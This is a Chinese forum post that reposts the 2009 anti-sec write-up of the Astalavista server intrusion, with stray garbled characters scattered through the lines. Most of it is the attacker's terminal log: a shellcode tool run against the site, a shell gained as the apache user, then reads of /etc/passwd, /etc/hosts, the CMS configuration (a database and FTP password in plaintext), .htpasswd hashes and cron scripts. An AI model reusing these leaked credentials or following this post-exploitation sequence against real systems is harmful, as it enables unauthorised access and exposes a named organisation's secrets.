里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。0 t& [9 `8 [1 C1 D' M2 b, ?5 V
* {5 ~5 Q5 o( B: n
[root@front3 ~]# curl -I litespeedtech.com
% l- H( C) V: z& a3 DHTTP/1.1 200 OK6 i! U& T) Y/ F& Z
Date: Fri, 05 Jun 2009 22:54:51 GMT
5 K* y4 c( u, r \# jServer: LiteSpeed
: X5 Q, W" n4 I
- E6 Z% x8 ^ ] ?+ I另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
6 k9 g" @$ L; Q9 ^0 K' K
# R, C. d; f) a7 T/ ^! d有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。" v0 C- g+ y7 ?5 D P4 i
, j D% Y( t. g3 |- h/ a2 T) _# J
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 3 u# T- J- j! j
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
' T4 h# Z7 C& d- @/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
* a6 ?' R, R1 v- @& e. {\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
4 y# [& f: T* o$ f: Q \/ \/ \/ \/ \/ \/ \/
, K Z3 f3 V$ b7 b. A6 D The Hacking & Security Community4 _# R. b+ G8 d+ p% {+ T0 i
[+] Founded in 1997 by a hacker computer enthusiast
4 [- Q N1 T/ T4 t( f5 I2 e2 L[-] Exposed in 2009 by anti-sec group
0 G) H1 j1 {1 S% m) K9 X
& W& j! I0 S5 n" `& h5 e _From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:# h, E/ r, z$ [2 N5 ]
>> 03. Who’s behind the site?$ K [. y' }. i0 _ L0 T
>>
# G m1 j7 U- L3 g9 t' C& D>> A team of security and IT professionals, and a countless number of contributors from all over the world.
, Z3 ~9 A }) [- ^) |8 i6 o; |4 L5 N1 n5 V+ a. E
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
# A5 H7 a9 ^9 g/ d# q>>
! r, k+ _; S# T4 L. Y6 ]1 Z% u>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
. o$ w4 Q3 a z, ^& _military institutions.
# O% C" [4 G& O/ ]8 I9 ~4 N' ^>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.+ F; @- q3 y) t
% t, P8 U7 v: B: [$ w8 AWhy has Astalavista been targeted?4 ^1 k7 y: z y# l( {
* X6 {' r/ o: z u# f
Other than the fact that they are not doing any of this for the “community” but. ]" f4 W# J# R6 S/ I, R4 o4 U/ G2 J
for the money, they spread exploits for kids, claim to be a security community; q7 y7 \1 ^( m- K
(with no real sense of security on their own servers), and they charge you $6.66
2 D6 `1 l( [2 X) f9 C6 Uper months to access a dead forum with a directory filled with public releases
, e6 J: y& a: pand outdated / broken services.6 d' Q c4 c! ^# G- Z$ ], w
; |: G/ y6 W9 O% @2 l7 E# c0 o
We wanted to see how good that “team of security and IT professionals” really is.
5 }" n1 K' {$ K; B9 O8 R$ Y# ?7 g5 @, `* o* \ j8 ]. M$ j
Let’s begin.
1 i. E: Q4 Q9 O5 @) P
, P4 r1 D9 Z3 x) G5 F6 d9 Manti-sec:~# ./g0tshell astalavista.com -p 802 c) C# w) c N; D
[+] Connecting to astalavista.com:80: X/ q. o% B# _! J% X' G
[+] Grabbing banner…
. W' K, m4 j. L$ q& f/ _# XLiteSpeed; `. D% s2 D; S0 F
[+] Injecting shellcode…
% o# I+ |0 Q1 s6 ^6 b[-] Wait for it6 }/ m4 e) U4 e& C( w: Z; _
+ w9 V/ r! b7 a M* K/ L
[~] We g0tshell% x9 }- x6 b, s- L" t" i
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux* E( [' W: g! W3 b
ID: uid=100(apache) gid=500(apache) groups=500(apache)2 d5 \0 t6 {- _8 J* R. G
' d! s) d7 ]7 G) F) z
sh-3.2$ cat /etc/passwd; A; t* h7 Q6 u8 @
root:x:0:0:root:/root:/bin/bash. ]3 }7 G- n, ~# o: s L' z! {
bin:x:1:1:bin:/bin:/sbin/nologin* R- `: y k0 m3 M9 L/ a% ~
daemon:x:2:2:daemon:/sbin:/sbin/nologin
3 u; w" u+ H, S- i, ~adm:x:3:4:adm:/var/adm:/sbin/nologin F( [/ Z' C0 A) V
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin6 a Y, Y; w; H2 X) y) R
sync:x:5:0:sync:/sbin:/bin/sync
% b- ?6 T" r: x$ [) Y- d! U9 \3 Cshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
& A- {0 d1 X/ P4 B+ }& p0 Mhalt:x:7:0:halt:/sbin:/sbin/halt
' o0 i1 ^: S7 l$ d% Pmail:x:8:12:mail:/var/spool/mail:/sbin/nologin5 S" F( k1 `- @+ M1 W3 W+ F
news:x:9:13:news:/etc/news:
4 }" Q0 D2 @1 p. x, uuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin& P+ E. C( d8 P4 P C" n) g' m# Y
operator:x:11:0 perator:/root:/sbin/nologin. ]+ h& Y6 I7 r( Q( h; b2 K
games:x:12:100:games:/usr/games:/sbin/nologin1 u# H! L5 ^' [8 u8 v. N6 I
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin1 _* u' @4 M* J
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
% g; [! s1 H7 vnobody:x:99:99:Nobody:/:/sbin/nologin
4 l- d6 q' m9 f- ?* [rpm:x:37:37::/var/lib/rpm:/sbin/nologin" G0 w) ~% q' f& Y: V$ O
dbus:x:81:81:System message bus:/:/sbin/nologin
0 ? Z1 G4 N3 `6 `nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
! e1 E2 x4 r1 P" A5 s0 dmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin7 [, \# T9 ?4 }5 q& U! f
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin2 m, Y0 m8 @" w: k1 x1 N" d
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
, Q5 n" C/ t# D C; X! }haldaemon:x:68:68:HAL daemon:/:/sbin/nologin# y. c; E& w9 _' H
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin7 w; M6 I+ }: E) k, U' O1 i- v
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
0 R- T0 P" M! ^nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin$ ~ A- ^% Q7 e. x" D6 g6 S
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin5 {/ K& s1 W+ t1 x! J: o( H& V8 P1 W
pcap:x:77:77::/var/arpwatch:/sbin/nologin5 F5 f ]. W/ {3 k
named:x:25:25:Named:/var/named:/sbin/nologin
! T' X6 s$ A0 L# s/ U% Vapache:x:100:500::/var/www:/bin/false
; c) c/ s% E1 c. b9 Zdiradmin:x:101:101::/usr/local/directadmin:/bin/bash; c8 M$ z3 i; }- X/ C8 q
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
5 O" Y* u8 v* Cwebapps:x:500:501::/var/www/html:/bin/bash
# [9 W* b- `0 l' N* [2 ymajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash/ G' H' G: `" r6 k/ }
admin:x:501:502::/home/admin:/bin/bash
, r* s) o* t/ ]; C! bjon:x:502:503::/home/jon:/bin/bash
) X6 B0 A3 |8 B# M. W! y# _$ @/ Vcom:x:503:504::/home/com:/bin/bash% u+ o3 t/ v9 Z& b6 E
ntp:x:38:38::/etc/ntp:/sbin/nologin% C5 y( _( y e B+ B9 Z
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin1 O2 L4 A, ^$ I- y2 O, d% W* ^
astanet:x:504:505::/home/astanet:/bin/bash
o, g( ?0 N" k3 g. h3 Cavahi:x:70:70:Avahi daemon:/:/sbin/nologin
: s3 }. D3 _2 `2 ?+ D7 }avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
! x% r& D, M5 l& O- Y
$ T/ M1 |' t( Tsh-3.2$ cat /etc/hosts
/ X) ~% m7 {5 x4 v# Do not remove the following line, or various programs( H" a) N* {3 O
# that require network functionality will fail.
t1 D% c8 Y3 T. n3 w127.0.0.1 localhost.localdomain localhost b7 ]3 L; u& ?3 Q1 B
::1 localhost6.localdomain6 localhost6
( j+ c* ^/ h% A* A8 c; A) E80.74.154.172 asta1.astalavistaserver.com% w& H1 ?! d( Z% i3 D' G7 }; a
* v" r6 K; x5 M8 z+ d, Y0 S0 k8 x
sh-3.2$ pwd" [ t1 {% B0 A$ s. s' _8 e
/home/com/public_html8 G" h; ?, X% P+ y6 h0 Z+ F- p3 i+ p
% X& @0 }$ J/ ksh-3.2$ ls -la
8 y. [5 B* q' t/ Etotal 18460
/ d+ l* w" d3 [* |7 N7 ]( Xdrwxr-xr-x 30 com apache 4096 May 28 17:06 .+ w+ t; s2 v" }& w; B
drwx–x–x 11 com com 4096 Jun 25 2008 ..
, m W( F6 M1 B3 p4 o* S+ fdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
. H1 C) F9 N1 u% ?drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
3 O7 H, K$ s; Z2 b+ d: i# Udrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
: \9 P: Z, o7 b8 t$ Z) a& [+ fdrwxrwxrwx 2 com com 4096 May 19 00:50 config g, d5 z+ Q1 n% E" Z: J6 p1 [- S# |
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
, X8 Y2 M, ]/ u, p6 [0 N$ }drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules- d# c5 S( l0 f2 y1 r; y2 j
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
0 B8 t- ?' a" P9 {# X& u7 Jdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
6 m& m5 a& a% tdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
( G5 p5 f+ m1 k- f4 N4 U: k- i o/ R-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
4 y/ y% J4 f! l8 Z3 e% G' Q/ z0 udrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
2 @- t9 G, ~0 S( b# V# |. j# m1 rdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
2 N9 r4 G- x5 ?1 q4 ~-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
. L3 l# K9 r" s k2 ^$ R; E3 v- Gdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed4 |3 i7 t0 o, p
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
; L$ {' w6 P+ l; J5 e-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
( K: M+ O4 _$ e* S; }-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak/ c& O7 v) [2 L' W# s, ]4 r
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
$ C3 h3 `% t, x& odrwxrwxrwx 14 com com 4096 Feb 2 19:29 images) k* q% w" o. Z |, y% Z
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php! }7 b4 Y: c3 J
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
, B* b; g: f- P5 R% Ddrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang, K: C4 v- K+ C, p
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
5 b( G) h. O9 d( K$ y4 @, L- Idrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
% x1 u' [- D+ g, @' a2 L0 x( n7 bdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
" }8 O4 z' n& @! k' idrwxr-xr-x 34 com com 4096 May 28 16:30 modules
% j1 I: j" [2 B2 s/ ]& I# fdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
, j% q& d- }2 C6 s/ Adrwxrwxr-x 22 com com 4096 May 28 17:06 _new
! }+ R' X- V" n# pdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old% }2 U7 ^+ h7 S8 @1 }! o
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
/ c6 d2 B7 p: }drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy0 N% h: r. G# ~: ^
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt- B5 [: T+ E: F5 p
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml7 u8 G6 r, T0 o
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
: U/ w1 }' A4 M+ e% L0 N; G" C5 `drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes' x1 Z8 R: \) I+ e
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
b: y' Q8 z9 n5 ]- d1 mdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam7 |6 s; v; |6 [4 h/ ], }
9 q/ l" P* q, L. S$ K3 ?1 z1 c
sh-3.2$ head -20 index.php
3 D9 u; _7 o3 @/ G<?php4 m4 Z) c7 C. { O1 b4 {8 A- C
6 ?" E, V; \, l# k& ]/** r) K( i* J7 i3 v; t7 `: E
* The main page for the CMS7 \8 a) W( I8 Z( L4 Z7 K
* @copyright CONTREXX CMS - COMVATION AG
0 J% K& `' O) H3 j9 \* @author Comvation Development Team. C& u2 m# @- c
* @version v1.0.9.10.1 stable8 K0 m0 ]6 ?: a
* @package contrexx
Z" k2 e4 `- g) b9 y' U/ y* @subpackage core
! \- ]% _" }5 l( [3 F* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
% O. i( n* P- {0 R% u6 D* @since v0.0.0.0
( D) l' B; V2 s( ]* @todo Capitalize all class names in project! d2 |3 h3 k- X6 b/ J9 H2 K
* @uses /config/configuration.php |* Z6 P0 w1 t! y
* @uses /config/settings.php
& |7 v* p& C% P* @uses /config/version.php
3 T" ^- n& j" O- G* @uses /core/API.php
7 |( f/ b) F l: q+ I `* @uses /core_modules/cache/index.class.php
- S" o7 _: L' M& l% B0 F6 Q% j* @uses /core/error.class.php" O, ]# }# s% |! N4 O
* @uses /core_modules/banner/index.class.php6 L1 v9 u* I5 d8 l8 p3 E1 V
* @uses /core_modules/contact/index.class.php5 V \ d1 q% b; `( I
3 v# E0 X& R2 o+ y$ Q2 g4 o7 i; p6 [
sh-3.2$ cd config/# v& z5 w, k; O
sh-3.2$ ls -la; a: T6 t" q7 T3 y8 M8 Z! p5 J
total 321 w; N* i( M- \5 w3 n4 E Q# K) V
drwxrwxrwx 2 com com 4096 May 19 00:50 .. M: ?, i4 @4 r' F
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..3 b% L% @* F. q: ~9 ]& D
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php" U) T9 a- w# y' e8 z
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
' T, Z& X+ T- A-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
4 m8 Z, V7 Q, t0 `# P' F: U-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
, K6 O- C6 P8 Y+ K
/ e; O' `! C! Osh-3.2$ cat configuration.php
& g! C4 {2 R; j9 P[snip]
6 T2 ]# w# b/ \1 b' t$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
; i( X- z; a& t4 p$ K( h3 J& x! {$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name4 Y4 t9 m; O+ c5 q/ v3 `+ J8 y
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix F/ I9 ^8 @4 V: a/ k$ \+ X2 n/ v
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username% C$ F8 {. l3 ~5 x2 S
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
+ @ j" Z) j4 H. Q4 @: Q( T$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)* U/ l5 [( @+ t- v, l
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
- Z% G- W# K: ^( H' n[snip]
7 H5 u6 ~$ u' H& |$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
7 u/ ^( W5 |+ c. C$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
$ D' I/ M9 [ i8 A$ `9 v0 j# H F! u$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
& n1 H$ ]" B6 \) N8 @, ^$ P* \$_FTPCONFIG['port'] = 21; // Ftp remote port
2 C) b4 y+ C8 n) d6 Z$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
5 U/ W) n0 `5 |' {2 z! y$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password. t& j, F: K. y$ }7 j; p, W
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms2 K- e( n5 f. a4 G
4 t& U' R2 B. G" z. |+ f
sh-3.2$ cd ..
X: d W* |" m* R0 j& D' fsh-3.2$ cd dvd/
" h9 @8 a# W L. [" bsh-3.2$ ls -la
' B! J: ?9 T# U6 wtotal 29137808 V! r+ {- m' C! b, d5 S5 D
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
J/ R( l, |4 mdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
% z% P+ g' C) l# f& W( c2 S-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
/ e/ ]1 U* v( T* |3 ^) d7 [-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar a; S, b1 Z1 v6 Q/ {6 T- j8 y, `0 K% U
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar8 [, c$ ~) N7 @5 T# u0 @
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
3 j9 j5 P+ s" G/ I, ]3 O7 _. g/ g# s2 f1 Y( Y V
sh-3.2$ cat .htaccess
5 f0 \6 Y0 l6 u4 y% EauthType Basic2 k; H4 V. u* i1 C) R
authName DVD
" o4 q# R6 V( g5 Y' M) Q5 K! ~authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd I: M( @+ h7 C* p( z) F3 f/ a5 Y* X. G5 N
require valid-user" U) W2 R7 o0 O6 T0 s! [2 Z8 g
! [) y- Y% m: Q2 P9 P2 p
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
! t* N' q, T4 gDVDdownload:CRD8cuY6.MPT64 t2 G# a' A$ i/ U* F3 `
DVDdownload2:CR8a36.wluFMg" X- m9 Y, \( s* N* ?1 n
/ L, \! j; ~4 }/ X# D
sh-3.2$ cat test.php/ A5 L- T1 w+ [
<?php
& M, ^: t! ]5 v; {. p8 I* I6 C# m- b; t! ^$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
7 B5 ?8 H. \; J% R$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
; Z/ W. a! k9 v# m/ f% b8 Becho $url;
: C! V; E' \1 @?>
3 _0 l$ u3 A1 l% b* a5 c' |+ R& F/ F6 g
sh-3.2$ cd modifications/
' j S( H/ g) N5 r! F4 R I. Q4 wsh-3.2$ ls -la
* P5 P/ }. K Q- h' \total 32$ X2 ^0 ^, O# {& {0 U
drwxr-xr-x 8 com com 4096 May 11 12:48 .
! i, ]! u) T4 M% c8 ~1 V" mdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
! [: |" c) d/ v! t2 A" X& fdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
. u8 g1 A0 j5 Ddrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
f" o0 h$ e, @% K( edrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
& s. a' T8 O8 \- S% W' fdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
5 i, S! o3 G. b9 ~( H: E, k8 ^drwxr-xr-x 2 com com 4096 Feb 2 19:33 search- s; j; D% c0 `+ M0 J& F
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp& Y% @ a: Z% ~2 [# {$ k
6 C9 s, p: j3 ~' Q9 @
sh-3.2$ ls -R! {& S9 Y, o3 R; E4 O% { Q, n+ z4 O
.:
) Y' U+ S) v( b- p5 bcom_avtng cronjobs onlinetools pjirc search _tmp% Q. a2 y/ o- k& m6 J5 h3 c4 Z2 n
4 S! i4 b' c! L
./com_avtng:
+ S0 P3 j' Y3 l& Q8 V+ I# u! l/ Favtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts8 G G/ ?& _( q! z9 p( l6 P6 c
d: v$ J- z, K- z8 P. x./com_avtng/scripts:: ?0 {9 I9 C8 h7 N. x7 R0 u
popunder.js, ^+ G( H& W; t4 e" r% c
, c# k7 Z8 {5 T# Z8 C
./cronjobs:
, }2 {! H# e( Pexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
! K" Z1 B" b% `2 L b6 C* l
U2 r; L, g% t8 s4 K' S$ d./cronjobs/tmp:4 H/ M, v& {& o& l
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv! [, B+ d% N) @# {5 C, _
, \# ?7 u7 C: T1 i# J* M./onlinetools:# R/ S1 T1 v( \: j/ Y' n+ v' |
index.php
& g8 c! J B0 }: \5 U) ?. N* n9 m' n4 Y0 i( @- V$ \* c) o
./pjirc:9 n' y5 k" P( \! H3 e
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt( D# c( U0 g" C7 t+ @. t3 z- V
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
$ Q% k9 s8 S7 q+ I* p$ obackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd; J0 A5 `: d" J* _# m
% L; S# U5 E( h4 j" F
./pjirc/img:
& f, F" G+ g7 e1 g# r: uange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
4 w6 d8 x7 B7 u, T7 F6 _arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif # N6 Q, Z" D' K/ j, s) Z# F
verre-eau.gif9 H, c- n! x5 I( W6 Y5 I' O
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif / B) V1 f$ @1 W0 m* e# g; w$ y
verre-vin.gif
) S4 K- Z n. M3 s x* k0 l0 u) e4 Pballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
* S: f! G4 X8 D, k7 s9 cbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif2 q4 z* |% ^- f
% ^5 h4 z5 `: b./pjirc/snd:
; V& v; r- `* f' Pbell2.au ding.au
) |- `! Y' p! X4 o6 M$ G7 d8 J. ?4 s+ j- D( P+ f3 X+ r, `2 ]
./search:- ?9 E, ?3 N1 e' @3 Y) J
searchEngines.php search.php
' @# U% i5 ^4 m& B+ y
- r y* a$ P" b5 O& R5 p/ ~; e./_tmp:
* t& V. ?$ Q, w2 s+ D* bdefaultPorts.php defaultPorts.txt. J% s* e0 \% W/ l1 r
2 a4 G2 Q5 k3 Ish-3.2$ cd cronjobs/, j5 {3 U9 O; q1 f1 J
sh-3.2$ cat exploits.php" Q1 z8 C! T3 d1 \4 j
[snip]
4 a. ^: r8 p# q) I; S& R8 ]$categories = array();: V) x4 \" [6 P3 _* x$ E
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’; }. r, G+ C; c( D- x: W
$expolits = file($milw0rmFile);: t! [$ u, A( W# ^
$comExploits = array();
/ x6 M9 b0 |) m! B: U: C2 T* }[snip]
1 \- v; S6 `# A5 }// manage data
$ |. B# l; ~ L* g2 ?- z/ Lfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
! B5 [; A* {7 q- d7 \% q! o
+ @! h o E" @$ J3 ] // get path and title( F4 ]) ?. v2 s# s3 m m& _
$expolits[$x] = trim($expolits[$x]);
0 L) \$ V) ]/ Z8 @. d $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));( p9 ^6 ~9 S4 K; M* d: ?2 G! m
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);' G% X( c4 b! R, p c
* d! E4 s. O& s) ]0 T" K. ` // check if file exists
+ i% F+ a3 L; f" F$ R if (file_exists($path)) {* M- H5 @( t/ R/ i0 k O$ ^
( N" i& r6 v/ Z4 D $text = file_get_contents($path);/ q$ X& ?: X4 j* v' F+ m
, `6 Y% u% Q! C0 h: S1 }+ \$ l. V( Q
// get content and date
" p/ S, j$ Y* u+ | //$text = htmlspecialchars($text, ENT_QUOTES);7 T9 v$ o' } A: o; e% w
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));( C0 s3 n/ Y' T S* M
if ($tmptext != ”) {
5 L- ^( b7 t4 r9 _ $text = $tmptext; y6 a: P2 G9 Y! H, `: @! g/ a* A1 j
} else {2 E* j) N$ z* U
$text = addslashes(htmlentities($text, ENT_QUOTES));
' k% G7 }) V& z" m* w }
9 e# H; B$ ^1 y1 \ $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
3 B! V) z% g7 d2 c6 b$ B $tmp = explode('-', $date);( o4 [3 x* V0 R" h# q& B
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
: O; \/ H! q" L" ^( n0 q3 }% i $cat = getCategory ($path);/ ] W& n) l2 d+ Z7 f" G" e
$ext = pathinfo(basename($path));6 M7 y- ~4 ~" _, C a6 H/ ^. e( b
$ext = $ext['extension'];
: M) d. p& B. |' Z( h8 J $qStr = ” U# I& _" t' _( f* V' M1 C3 N9 W
SELECT `id`+ J; |: e, w z% x
FROM `contrexx_module_exploits`
1 ?1 | r7 i: _) C0 w6 p" b WHERE `title` = ‘” . $title . “‘
& |) C8 i8 Y2 c! \1 v" c9 V. J AND `date` = ‘” . $date . “‘
4 v8 c+ I7 p5 g “;6 c% Y6 h5 r) k U0 Q& q3 G3 I
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;# w, `+ N- z# j2 F3 i4 w7 [
$q = $_objDB->query($qStr); q- y8 W# J6 q; p- V% S
9 M% F5 B, C& ~: u9 i( S7 K% ~9 S
if ($q->numRows() == 0) {+ x$ K# R+ u5 y6 F# U2 P
0 E# O8 r# P' R* c1 f/ [4 w
// prepare array
8 o! J; t( S& e& P$ M+ F5 | $comExploits[$x]['date'] = $date;
2 z& k1 i5 _6 q1 w( q $comExploits[$x]['title'] = $title;5 B ?( W. U2 o7 B: k9 b" p
$comExploits[$x]['author'] = ‘milw0rm’;
+ r9 X* o; ?+ l4 d5 N. M- I5 U% y $comExploits[$x]['text'] = $text;. ~) E+ f' F: C* [! I' k
$comExploits[$x]['source'] = $ext;5 D- o. q; O4 b( ?! J- l, I9 E( H
$comExploits[$x]['url1'] = ”;, O4 t6 Y- V- ?6 l
$comExploits[$x]['url2'] = ”;; q* n- c5 o3 i- a9 p% z
$comExploits[$x]['catid'] = $cat;, s3 d5 L$ l: r) z
$comExploits[$x]['lang'] = ‘2′;
2 _9 h) @/ |8 }8 J9 B$ j3 B $comExploits[$x]['userid'] = ‘12′;
1 P7 I- v. M9 t. s# X9 Q $comExploits[$x]['startdate'] = ‘0000-00-00′;
( o" T1 K# r, u( ~ $comExploits[$x]['enddate'] = ‘0000-00-00′;2 o8 T9 N5 N0 W4 L2 f4 V2 ^
$comExploits[$x]['status'] = ‘1′;
9 @% _) T8 ^9 O' J. h; v $comExploits[$x]['changelog'] = $date;- W [1 _" K" B& W$ O4 m. v4 Q O8 I
0 O# E5 ?, x$ P
}
3 h! ~( b# M3 b( w+ W5 j[snip]
) C. L m' S @ $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>7 i' c' Q1 p& t2 B# m0 W
<rss version=”2.0″>3 g- v5 E2 { _& J( Q o2 ~
<channel>
